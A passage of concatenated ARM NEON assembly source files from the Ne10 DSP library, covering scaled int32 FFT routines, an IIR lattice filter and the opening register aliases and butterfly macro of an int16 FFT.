vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_scaled_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_scaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_scaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2 /* next stage: mstride *= 4, fstride /= 4 */
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_scaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_scaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* last stage writes to the saved original Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_scaled_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "FALSE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_scaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_scaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_forward_int32_scaled_neon */
/**
* @details This function implements a radix-4/8 backwards FFT.
*
* @param[in,out] *Fout points to input/output pointers
* @param[in] *factors factors pointer:
* 0: stage number
* 1: stride for the first stage
* others: factor out powers of 4, powers of 2
* @param[in] *twiddles twiddles coeffs of FFT
*
* Scaled inverse variant: butterfly macros run with scaled_flag="TRUE"
* (per-stage pre-shift against overflow) and inverse="TRUE" (conjugated
* rotations). NOTE(review): p_fout/p_fin/p_factors/p_twiddles are .req
* aliases from the file preamble; the 5th (stack) argument is the scratch
* buffer read at [sp, #104] (40 B of GPRs + 64 B of q4-q7 pushed below it).
*/
.align 4
.global ne10_mixed_radix_fft_backward_int32_scaled_neon
.thumb
.thumb_func
ne10_mixed_radix_fft_backward_int32_scaled_neon:
push {r4-r12,lr}
vpush {q4-q7}
ldr stage_count, [p_factors] /* get factors[0]---stage_count */
ldr fstride, [p_factors, #4] /* get factors[1]---fstride */
add p_factors, p_factors, stage_count, lsl #3 /* get the address of factors[2*stage_count] */
ldr radix, [p_factors] /* get factors[2*stage_count]--- the first radix */
ldr mstride, [p_factors, #-4] /* get factors[2*stage_count-1]--- mstride */
/* save the output buffer for the last stage */
mov p_out_ls, p_fout
/* ---------------the first stage--------------- */
/* judge the radix is 4 or 8 */
cmp radix, #8
beq .L_ne10_radix8_butterfly_inverse_scaled_first_stage
/* ---------------first stage: radix 4 */
mov count, fstride
mov p_fin0, p_fin
mov p_tmp, p_fout
add p_fin2, p_fin0, fstride, lsl #4 /* get the address of F[fstride*2] */
add p_fin1, p_fin0, fstride, lsl #3 /* get the address of F[fstride] */
add p_fin3, p_fin2, fstride, lsl #3 /* get the address of F[fstride*3] */
vld2.32 {q_in0_01}, [p_fin0:64]!
vld2.32 {q_in2_01}, [p_fin2:64]!
vld2.32 {q_in1_01}, [p_fin1:64]!
vld2.32 {q_in3_01}, [p_fin3:64]!
.L_ne10_radix4_butterfly_inverse_scaled_first_stage_fstride:
BUTTERFLY4X2_WITHOUT_TWIDDLES "TRUE", "TRUE"
subs count, count, #2 /* two complex samples per butterfly iteration */
bgt .L_ne10_radix4_butterfly_inverse_scaled_first_stage_fstride
/* swap input/output buffer */
/* tmp0 = 5th (stack) argument: scratch buffer; 104 = 40 B GPRs + 64 B q4-q7 */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* (stage_count-2): reduce the counter for the last stage */
sub stage_count, stage_count, #2
lsl nstep, fstride, #3 /* nstep = fstride * 8 bytes (one complex int32) */
lsr fstride, fstride, #2
b .L_ne10_butterfly_inverse_scaled_other_stages
/* ---------------end of first stage: radix 4 */
/* ---------------first stage: radix 8 */
.L_ne10_radix8_butterfly_inverse_scaled_first_stage:
mov fstride1, fstride
mov p_in1, p_fin
mov p_out1, p_fout
lsl fstep, fstride, #3
.L_ne10_radix8_butterfly_inverse_scaled_first_stage_fstride1:
BUTTERFLY8X2_WITHOUT_TWIDDLES "TRUE", "TRUE"
subs fstride1, fstride1, #2
bgt .L_ne10_radix8_butterfly_inverse_scaled_first_stage_fstride1
lsl nstep, fstride, #4
sub stage_count, stage_count, #1
lsr fstride, fstride, #2
/* swap input/output buffer */
ldr tmp0, [sp, #104]
mov p_fin, p_fout
mov p_fout, tmp0
/* if the last stage */
cmp stage_count, #1
beq .L_ne10_butterfly_inverse_scaled_last_stages
/* (stage_count-1): reduce the counter for the last stage */
sub stage_count, stage_count, #1
/*--------------- end of first stage: radix 8 */
/* ---------------end of first stage--------------- */
/* ---------------other stages except last stage--------------- */
/* loop of other stages */
.L_ne10_butterfly_inverse_scaled_other_stages:
lsl mstep, mstride, #3
mov p_in1, p_fin
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
/* loop of fstride */
mov count_f, fstride
.L_ne10_butterfly_inverse_scaled_other_stages_fstride:
mov p_tw1, p_twiddles
sub tmp0, fstride, count_f
mul tmp0, tmp0, mstride
add p_out1, p_fout, tmp0, lsl #5 /* p_out1 = p_fout + (f index)*mstride*4 elements */
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_scaled_other_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_scaled_other_stages_mstride
/* end of mstride loop */
subs count_f, count_f, #1
bgt .L_ne10_butterfly_inverse_scaled_other_stages_fstride
add p_twiddles, p_twiddles, mstride, lsl #4
add p_twiddles, p_twiddles, mstride, lsl #3 /* get the address of twiddles += mstride*3 */
lsl mstride, mstride, #2 /* next stage: mstride *= 4, fstride /= 4 */
lsr fstride, fstride, #2
/* swap input/output buffer */
mov tmp0, p_fout
mov p_fout, p_fin
mov p_fin, tmp0
subs stage_count, stage_count, #1
bgt .L_ne10_butterfly_inverse_scaled_other_stages
/* ---------------end other stages except last stage--------------- */
/* ---------------last stage--------------- */
.L_ne10_butterfly_inverse_scaled_last_stages:
mov p_in1, p_fin
mov p_out1, p_out_ls /* last stage writes to the saved original Fout */
mov p_tw1, p_twiddles
mov mstep, nstep
vld2.32 {d_fin0_r, d_fin0_i}, [p_in1:64], nstep
vld2.32 {d_fin1_r, d_fin1_i}, [p_in1:64], nstep
vld2.32 {d_fin2_r, d_fin2_i}, [p_in1:64], nstep
vld2.32 {d_fin3_r, d_fin3_i}, [p_in1:64], nstep
vld2.32 {d_tw0_r, d_tw0_i}, [p_tw1:64], mstep
vld2.32 {d_tw1_r, d_tw1_i}, [p_tw1:64], mstep
vld2.32 {d_tw2_r, d_tw2_i}, [p_tw1:64]
/* loop of mstride */
mov count_m, mstride
.L_ne10_butterfly_inverse_scaled_last_stages_mstride:
BUTTERFLY4X2_WITH_TWIDDLES "TRUE", "TRUE"
subs count_m, count_m, #2
bgt .L_ne10_butterfly_inverse_scaled_last_stages_mstride
/* end of mstride loop */
/* ---------------end of last stage--------------- */
.L_ne10_butterfly_inverse_scaled_end:
/*Return From Function*/
vpop {q4-q7}
pop {r4-r12,pc}
/* end of ne10_mixed_radix_fft_backward_int32_scaled_neon */
/* end of the file */
.end
|
open-vela/external_Ne10 | 14,434 | modules/dsp/NE10_iir.neon.s | @
@ Copyright 2012-16 ARM Limited and Contributors.
@ All rights reserved.
@
@ Redistribution and use in source and binary forms, with or without
@ modification, are permitted provided that the following conditions are met:
@ * Redistributions of source code must retain the above copyright
@ notice, this list of conditions and the following disclaimer.
@ * Redistributions in binary form must reproduce the above copyright
@ notice, this list of conditions and the following disclaimer in the
@ documentation and/or other materials provided with the distribution.
@ * Neither the name of ARM Limited nor the
@ names of its contributors may be used to endorse or promote products
@ derived from this software without specific prior written permission.
@
@ THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
@ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
@ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
@ DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
@ DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
@ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
@ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
@ ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
@ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
@ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
@
@/*
@ * NE10 Library : dsp/NE10_iir.neon.s
@ */
@/*
@ * Note:
@ * 1. Currently, this is for soft VFP EABI, not for hard vfpv3 ABI yet
@ * 2. In the assembly code, we use D0-D31 registers. So VFPv3-D32 is used. In VFPv3-D16, there will be failure
@ */
#ifdef ENABLE_NE10_IIR_LATTICE_FLOAT_NEON
.text
.syntax unified
@/**
@ *
@ * @brief Processing function for the floating-point IIR lattice filter.
@ *
@ * when tap > 16, you could get
@ * maximized improvement
@ *
@ * @param[in] *S points to an instance of the floating-point IIR lattice structure.
@ * @param[in] *pSrc points to the block of input data.
@ * @param[out] *pDst points to the block of output data.
@ * @param[in] blockSize number of samples to process.
@ */
.align 4
.global ne10_iir_lattice_float_neon
.extern ne10_qMaskTable32
.thumb
.thumb_func
@/**
@ * ne10_iir_lattice_float_neon(S, pSrc, pDst, blockSize)
@ * r0 = instance struct, read sequentially below as:
@ *      u16 numStages, (pad), ptr state, ptr kCoeffs (reflection),
@ *      ptr vCoeffs (ladder)
@ * r1 = input samples, r2 = output samples, r3 = number of samples.
@ * Processes one output sample per outer-loop pass, 4 lattice taps per
@ * inner-loop pass; ne10_qMaskTable32 supplies lane masks used to handle
@ * the tail when numStages is not a multiple of 4.
@ */
ne10_iir_lattice_float_neon:
PUSH {r4-r12,lr} @push r12: to keep stack 8 bytes aligned
VPUSH {d8-d9}
@/*ARM Registers*/
pStateStruct .req R0
pSrc .req R1
pDst .req R2
blockSize .req R3
pState .req R4 @/* State pointer */
pKcoeffs .req R5 @/* Coefficient pointer */
pVcoeffs .req R6 @/* Coefficient pointer */
pX .req R7 @/* Temporary pointers for state buffer */
pK .req R8 @/* Temporary pointers for coefficient buffer */
numStages .req R9 @/* Length of the filter */
tapCnt .req R10 @ /* Loop counter */
pTemp .req R11
pMask .req R14 @ /* Mask Table */
mask .req R12 @/* NOTE: mask and pV share R12; their live ranges do not overlap */
pV .req R12
@/*NEON variable Declaration*/
dTemp3a_0 .dn D0.U32
dTemp3_0 .dn D0.F32
dMask2 .dn D1.U32
qGcurr .qn Q1.F32
dGcurr_0 .dn D2.F32
dGcurr_1 .dn D3.F32
qZero .qn Q2.F32
qMask .qn Q3.U32
dMask_0 .dn D6.U32
dMask_1 .dn D7.U32
dOut_0 .dn D6.F32
dOut_1 .dn D7.F32
qGK .qn Q4.F32
dGK_0 .dn D8.F32
dGK_1 .dn D9.F32
qAcc0 .qn Q8.F32
dAcc0_0 .dn D16.F32
dAcc0_1 .dn D17.F32
qTemp .qn Q9.F32
dTemp_0 .dn D18.F32
dTemp_1 .dn D19.F32
qFnext .qn Q10.F32
dFnext_0 .dn D20.F32
dFnext_1 .dn D21.F32
qFcurr .qn Q11.F32
dFcurr_0 .dn D22.F32
dFcurr_1 .dn D23.F32
qCoeff0 .qn Q12.F32
dCoeff0_0 .dn D24.F32
dCoeff0_1 .dn D25.F32
qMask1 .qn Q13.U32
dMask1_0 .dn D26.U32
dMask1_1 .dn D27.U32
qMaskTmp .qn Q14.U32
dMaskTmp_0 .dn D28.U32
dMaskTmp_1 .dn D29.U32
qGnext .qn Q15.F32
dGnext_0 .dn D30.F32
dGnext_1 .dn D31.F32
@/* Length of the filter */
LDRH numStages,[pStateStruct],#4
@/* State pointer */
LDR pState,[pStateStruct],#4
@/* Coefficient pointer */
LDR pKcoeffs,[pStateStruct],#4
LDR pVcoeffs,[pStateStruct],#4
@/*Load Mask Values*/
#ifdef __PIC__
@/* position-independent access of LDR pMask,=ne10_qMaskTable32 */
LDR pMask,.L_PIC0_GOT_OFFSET
LDR pTemp,.L_GOT_ne10_qMaskTable32
.L_PIC0:
ADD pMask,pMask, pc
LDR pMask,[pMask, pTemp]
#else
LDR pMask,=ne10_qMaskTable32
#endif
@/* mask = numStages % 4; pick the mask-table rows (16 B each) for the tail */
AND mask,numStages,#3
ADD tapCnt,mask,#1
ADD pTemp,pMask,mask,LSL #4
ADD tapCnt,pMask,tapCnt,LSL #4
VLD1 {dMaskTmp_0,dMaskTmp_1},[pTemp]
VLD1 {dMask1_0,dMask1_1},[tapCnt]
ADD pTemp,pMask,#16
VEOR qZero,qZero
VLD1 {dMask2},[pTemp]
@/*while blockSize > 0*/
CMP blockSize, #0
BEQ iirLatticeCopy
iirLatticeOuterLoop:
@/* broadcast the new input sample x[n] to all lanes of qFcurr */
VLD1 {dFcurr_0[],dFcurr_1[]},[pSrc]!
MOV pX,pState
VEOR qAcc0,qAcc0
@/* Initialize Ladder coeff pointer */
ADD pV,pVcoeffs,numStages, LSL #2
MOV pK,pKcoeffs
VLD1 {dGcurr_0,dGcurr_1},[pX]
@/* Load the filter Taps */
VLD1 {dCoeff0_0,dCoeff0_1},[pK]!
SUBS tapCnt,numStages,#4
ADD pV,pV,#4
BLT iirLatticeEndInnerLoop
iirLatticeInnerLoop:
VMUL qGK,qGcurr,qCoeff0
@/* g4k4+g5k5 g6k6+g7k7*/
VPADD dTemp_0,dGK_1,dGK_0
@/*g6k6 g4k4+g5k5*/
VEXT dTemp_1,dTemp_0,dGK_1,#1
@/*g7k7+g6k6+g5k5+g4k4 g6k6+g5k5+g4k4*/
VPADD dTemp_1,dTemp_1,dTemp_0
@/* build running prefix sums of g*k across the 4 lanes via dMask2 select */
VMOV dTemp3a_0,dMask2
VBSL dTemp3a_0,dGK_0,dTemp_0
VMOV dTemp_0,dTemp3_0
@/* fN-1(n) = fN(n) - kN * gN-1(n-1), four taps at once */
VSUB qFnext,qFcurr,qTemp
@/* gN(n) = kN * fN-1(n) + gN-1(n-1) */
VMLA qGcurr,qFnext,qCoeff0
@/* y(n) += gN(n) * vN */
SUB pV,pV,#16
VLD1 {dCoeff0_0,dCoeff0_1},[pV]
@/* write gN-1(n-1) into state for next sample processing */
VST1 {dGcurr_0,dGcurr_1},[pX]!
@/* ladder coeffs were loaded in descending order: reverse to match lanes */
VREV64 qCoeff0,qCoeff0
@/* acc0 += gnext * (*pv--)@ */
VMLA dAcc0_0,dGcurr_0,dCoeff0_1
VMLA dAcc0_1,dGcurr_1,dCoeff0_0
@/* Update f values for next coefficients processing */
VDUP qFcurr,dFnext_1[1]
VLD1 {dGcurr_0,dGcurr_1},[pX]
@/* Load the filter Taps */
VLD1 {dCoeff0_0,dCoeff0_1},[pK]!
SUBS tapCnt,#4
BGE iirLatticeInnerLoop
iirLatticeEndInnerLoop:
@/* If the filter length is not a multiple of 4, compute the remaining filter taps */
ADDS tapCnt,#4
IT GT
SUBGT tapCnt,#1
VMUL qGK,qGcurr,qCoeff0
VPADD dTemp_0,dGK_1,dGK_0
VEXT dTemp_1,dTemp_0,dGK_1,#1
VPADD dTemp_1,dTemp_1,dTemp_0
VMOV dTemp3a_0,dMask2
VBSL dTemp3a_0,dGK_0,dTemp_0
VMOV dTemp_0,dTemp3_0
@/*Mask the Unnecessary f values*/
VMOV qFnext,qMaskTmp
VBSL qFnext,qTemp,qZero
VSUB qFnext,qFcurr,qFnext
VMOV qGnext,qGcurr
VMLA qGnext,qFnext,qCoeff0
@/*Store on to stack for getting proper Fnext*/
@/* scratch area just below SP: spill the 4 fnext lanes so the lane indexed
@   by tapCnt can be re-loaded and broadcast as the sample's final f value */
SUB pTemp,SP,#20
VST1 {dFnext_0,dFnext_1},[pTemp]
ADD pTemp,pTemp,tapCnt, LSL #2
VLD1 {dTemp_0[],dTemp_1[]},[pTemp]
VMOV qGcurr,qMaskTmp
VBSL qGcurr,qGnext,qTemp
@/* merge the valid tail lanes of g into the state buffer */
VLD1 {dTemp_0,dTemp_1},[pX]
VMOV qMask,qMask1
VBSL qMask,qGcurr,qTemp
VST1 {dMask_0,dMask_1},[pX]
ADD pX,pX,tapCnt,LSL #2
SUB pV,pV,#16
VLD1 {dCoeff0_0,dCoeff0_1},[pV]
@// Mask the Gnext value used for Output calculation
VMOV qGnext,qMask1
VBSL qGnext,qGcurr,qZero
ADD pX,pX,#4
VREV64 qCoeff0,qCoeff0
VMLA dAcc0_0,dGnext_0,dCoeff0_1
VMLA dAcc0_1,dGnext_1,dCoeff0_0
/*Get Accumulated Result in to single Value*/
VLD1 {dTemp_1},[pDst]
VPADD dTemp_0,dAcc0_0,dAcc0_1
VPADD dTemp_0,dTemp_0
@/* store only the low 32-bit lane (one float) without disturbing pDst[1] */
VMOV dMask_0,dMask2
VBSL dMask_0,dTemp_0,dTemp_1
VST1 {dMask_0},[pDst]
ADD pDst,#4
ADD pState,#4
SUBS blockSize,#1
BGT iirLatticeOuterLoop
@/* copy last S->numStages samples to start of the buffer
@for next frame process */
iirLatticeCopy:
AND mask,numStages,#3
ADD pTemp,pMask,mask,LSL #4
@/* pX = state pointer re-read from the instance struct (pStateStruct was
@   post-incremented by 12 during the header loads above) */
LDR pX,[pStateStruct,#-12]
VLD1 {dFcurr_0,dFcurr_1},[pState]!
VLD1 {dMask_0,dMask_1},[pTemp]
SUBS tapCnt,numStages,#4
BLT iirLatticeEnd
iirLatticeCopyLoop:
VST1 {dFcurr_0,dFcurr_1},[pX]!
SUBS tapCnt,#4
VLD1 {dFcurr_0,dFcurr_1},[pState]!
BGE iirLatticeCopyLoop
iirLatticeEnd:
@/* masked store of the final (< 4) state values */
VLD1 {dTemp_0,dTemp_1},[pX]
VBSL qMask,qFcurr,qTemp
VST1 {dOut_0,dOut_1},[pX]
ADD pX,pX,mask, LSL #2
@/*ARM Registers*/
.unreq pStateStruct
.unreq pSrc
.unreq pDst
.unreq blockSize
.unreq pState
.unreq pKcoeffs
.unreq pVcoeffs
.unreq pX
.unreq pK
.unreq numStages
.unreq tapCnt
.unreq pTemp
.unreq pMask
.unreq mask
.unreq pV
@/*NEON variable Declaration*/
.unreq dTemp3a_0
.unreq dTemp3_0
.unreq dMask2
.unreq qGcurr
.unreq dGcurr_0
.unreq dGcurr_1
.unreq qZero
.unreq qMask
.unreq dMask_0
.unreq dMask_1
.unreq dOut_0
.unreq dOut_1
.unreq qGK
.unreq dGK_0
.unreq dGK_1
.unreq qAcc0
.unreq dAcc0_0
.unreq dAcc0_1
.unreq qTemp
.unreq dTemp_0
.unreq dTemp_1
.unreq qFnext
.unreq dFnext_0
.unreq dFnext_1
.unreq qFcurr
.unreq dFcurr_0
.unreq dFcurr_1
.unreq qCoeff0
.unreq dCoeff0_0
.unreq dCoeff0_1
.unreq qMask1
.unreq dMask1_0
.unreq dMask1_1
.unreq qMaskTmp
.unreq dMaskTmp_0
.unreq dMaskTmp_1
.unreq qGnext
.unreq dGnext_0
.unreq dGnext_1
VPOP {d8-d9}
POP {r4-r12,pc}
#ifdef __PIC__
@/*GOT trampoline values*/
.align 4
.L_PIC0_GOT_OFFSET:
.word _GLOBAL_OFFSET_TABLE_-(.L_PIC0+4)
.L_GOT_ne10_qMaskTable32:
.word ne10_qMaskTable32(GOT)
#endif
.end
#endif // ENABLE_NE10_IIR_LATTICE_FLOAT_NEON
|
open-vela/external_Ne10 | 50,237 | modules/dsp/NE10_fft_int16.neon.s | /*
* Copyright 2013-16 ARM Limited and Contributors.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* * Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of ARM Limited nor the
* names of its contributors may be used to endorse or promote products
* derived from this software without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY ARM LIMITED AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL ARM LIMITED AND CONTRIBUTORS BE LIABLE FOR ANY
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
/*
* NE10 Library : dsp/NE10_fft_int16.neon.s
*/
.text
.syntax unified
/* Registers define*/
/*
 * NOTE(review): the ARM core registers below are heavily aliased --
 * one physical register carries different logical names in different
 * phases of the FFT (r2 = p_factors, later count / fstride1 / nstep;
 * r7 = p_fin0, later fstep / mstep; r9 = p_fin2, later count_m / tmp0;
 * r10 = p_fin3 / p_tw1; r11 = p_tmp / p_in1; r12 = radix / p_out1).
 * An alias is only live in the phase its name belongs to; two names
 * for the same register never hold values simultaneously.
 */
/*ARM Registers*/
p_fout .req r0
p_fin .req r1
p_factors .req r2
p_twiddles .req r3
stage_count .req r4
fstride .req r5
mstride .req r6
radix .req r12
p_fin0 .req r7
p_fin1 .req r8
p_fin2 .req r9
p_fin3 .req r10
p_tmp .req r11
count .req r2
fstride1 .req r2
fstep .req r7
p_out_ls .req r14
nstep .req r2
mstep .req r7
count_f .req r8
count_m .req r9
p_tw1 .req r10
p_in1 .req r11
p_out1 .req r12
tmp0 .req r9
/*NEON variable declarations for the first stage*/
/* radix-4 first-stage aliases; d_* names are 64-bit views that
 * overlap the q_* registers (e.g. d_s1_r2/d_s1_i2 are the halves of
 * q_s1_2 = q5). */
q_in0_01 .qn q0
q_in1_01 .qn q1
q_in2_01 .qn q2
q_in3_01 .qn q3
q_s0_2 .qn q4
q_s1_2 .qn q5
q_s2_2 .qn q6
q_s3_2 .qn q7
d_s1_r2 .dn d10
d_s1_i2 .dn d11
d_s3_r2 .dn d14
d_s3_i2 .dn d15
q_out0_2 .qn q8
q_out1_2 .qn q9
q_out2_2 .qn q10
q_out3_2 .qn q11
d_out1_r15 .dn d18
d_out1_i15 .dn d19
d_out3_r37 .dn d22
d_out3_i37 .dn d23
/* radix-8 first-stage aliases: 8 complex inputs in q0-q7, with the
 * d_inN_r/d_inN_i pairs overlapping the same q registers. */
d_in0_r .dn d0
d_in0_i .dn d1
d_in1_r .dn d2
d_in1_i .dn d3
d_in2_r .dn d4
d_in2_i .dn d5
d_in3_r .dn d6
d_in3_i .dn d7
d_in4_r .dn d8
d_in4_i .dn d9
d_in5_r .dn d10
d_in5_i .dn d11
d_in6_r .dn d12
d_in6_i .dn d13
d_in7_r .dn d14
d_in7_i .dn d15
q_in0 .qn q0
q_in1 .qn q1
q_in2 .qn q2
q_in3 .qn q3
q_in4 .qn q4
q_in5 .qn q5
q_in6 .qn q6
q_in7 .qn q7
q_sin0 .qn q8
q_sin1 .qn q9
q_sin2 .qn q10
q_sin3 .qn q11
q_sin4 .qn q12
q_sin5 .qn q13
q_sin6 .qn q14
q_sin7 .qn q15
d_sin3_r .dn d22
d_sin3_i .dn d23
d_sin5_r .dn d26
d_sin5_i .dn d27
d_sin7_r .dn d30
d_sin7_i .dn d31
d_tw_twn .dn d0
d_s3_r .dn d2
d_s3_i .dn d3
d_s7_r .dn d4
d_s7_i .dn d5
q_s3 .qn q1
q_s7 .qn q2
q_s8 .qn q11
q_s9 .qn q15
q_s10 .qn q3
q_s11 .qn q4
q_s12 .qn q5
q_s13 .qn q6
q_s14 .qn q7
q_s15 .qn q0
q_out0 .qn q1
q_out1 .qn q2
q_out2 .qn q8
q_out3 .qn q9
q_out4 .qn q10
q_out5 .qn q12
q_out6 .qn q13
q_out7 .qn q14
d_s10_r .dn d6
d_s10_i .dn d7
d_s11_r .dn d8
d_s11_i .dn d9
d_s14_r .dn d14
d_s14_i .dn d15
d_s15_r .dn d0
d_s15_i .dn d1
d_out2_r .dn d16
d_out2_i .dn d17
d_out3_r .dn d18
d_out3_i .dn d19
d_out6_r .dn d26
d_out6_i .dn d27
d_out7_r .dn d28
d_out7_i .dn d29
/*NEON variable declarations for mstride loop */
d_fin0_r .dn d0
d_fin0_i .dn d1
d_fin1_r .dn d2
d_fin1_i .dn d3
d_fin2_r .dn d4
d_fin2_i .dn d5
d_fin3_r .dn d6
d_fin3_i .dn d7
d_tw0_r .dn d8
d_tw0_i .dn d9
d_tw1_r .dn d10
d_tw1_i .dn d11
d_tw2_r .dn d12
d_tw2_i .dn d13
q_fin0 .qn q0
q_fin1 .qn q1
q_fin2 .qn q2
q_fin3 .qn q3
q_scr0 .qn q15
q_scr1_r .qn q7
q_scr1_i .qn q8
q_scr2_r .qn q9
q_scr2_i .qn q10
q_scr3_r .qn q11
q_scr3_i .qn q12
/* After vrshrn narrows the 32-bit products, q_scr1..q_scr3 reuse the
 * same physical registers that held the q_scrN_r/q_scrN_i products. */
q_scr1 .qn q7
q_scr2 .qn q8
q_scr3 .qn q9
q_scr4 .qn q10
q_scr5 .qn q11
q_scr6 .qn q12
q_scr7 .qn q13
d_scr1_r .dn d14
d_scr1_i .dn d15
d_scr2_r .dn d16
d_scr2_i .dn d17
d_scr3_r .dn d18
d_scr3_i .dn d19
d_scr5_r .dn d22
d_scr5_i .dn d23
d_scr7_r .dn d26
d_scr7_i .dn d27
q_fout0 .qn q7
q_fout2 .qn q8
d_fout0_r .dn d14
d_fout0_i .dn d15
d_fout1_r .dn d28
d_fout1_i .dn d29
d_fout2_r .dn d16
d_fout2_i .dn d17
d_fout3_r .dn d30
d_fout3_i .dn d31
/*
 * BUTTERFLY4X4_WITHOUT_TWIDDLES scaled_flag, inverse
 * One iteration of the first-stage radix-4 butterfly, processing 4
 * butterflies (4 complex s16 lanes) at once with unit twiddles.
 * The caller pre-loads q_in0_01..q_in3_01; this macro consumes them
 * and immediately reloads the NEXT iteration's inputs from
 * p_fin0..p_fin3 (post-incremented) to hide load latency.
 * scaled_flag "TRUE": vhadd/vhsub halve every sum/difference, so the
 *                     whole radix-4 pass divides by 4 and cannot
 *                     overflow s16; otherwise plain vadd/vsub.
 * inverse "TRUE":     backward-FFT rotation of the odd outputs
 *                     (out1 = s1 + j*s3, out3 = s1 - j*s3); the
 *                     forward FFT uses the opposite signs.
 * Results are 4x4-transposed and stored contiguously through p_tmp.
 */
.macro BUTTERFLY4X4_WITHOUT_TWIDDLES scaled_flag, inverse
/* radix 4 butterfly without twiddles */
.ifeqs "\scaled_flag", "TRUE"
/* scaled_flag is true*/
vhadd.s16 q_s0_2, q_in0_01, q_in2_01   /* s0 = (in0 + in2)/2 */
vhsub.s16 q_s1_2, q_in0_01, q_in2_01   /* s1 = (in0 - in2)/2 */
vld2.16 {q_in0_01}, [p_fin0:64]!       /* prefetch next iteration */
vld2.16 {q_in2_01}, [p_fin2:64]!
vhadd.s16 q_s2_2, q_in1_01, q_in3_01   /* s2 = (in1 + in3)/2 */
vhsub.s16 q_s3_2, q_in1_01, q_in3_01   /* s3 = (in1 - in3)/2 */
vld2.16 {q_in1_01}, [p_fin1:64]!
vld2.16 {q_in3_01}, [p_fin3:64]!
vhsub.s16 q_out2_2, q_s0_2, q_s2_2     /* out2 = (s0 - s2)/2 */
vhadd.s16 q_out0_2, q_s0_2, q_s2_2     /* out0 = (s0 + s2)/2 */
.ifeqs "\inverse", "TRUE"
/* out1 = (s1 + j*s3)/2, out3 = (s1 - j*s3)/2 */
vhsub.s16 d_out1_r15, d_s1_r2, d_s3_i2
vhadd.s16 d_out1_i15, d_s1_i2, d_s3_r2
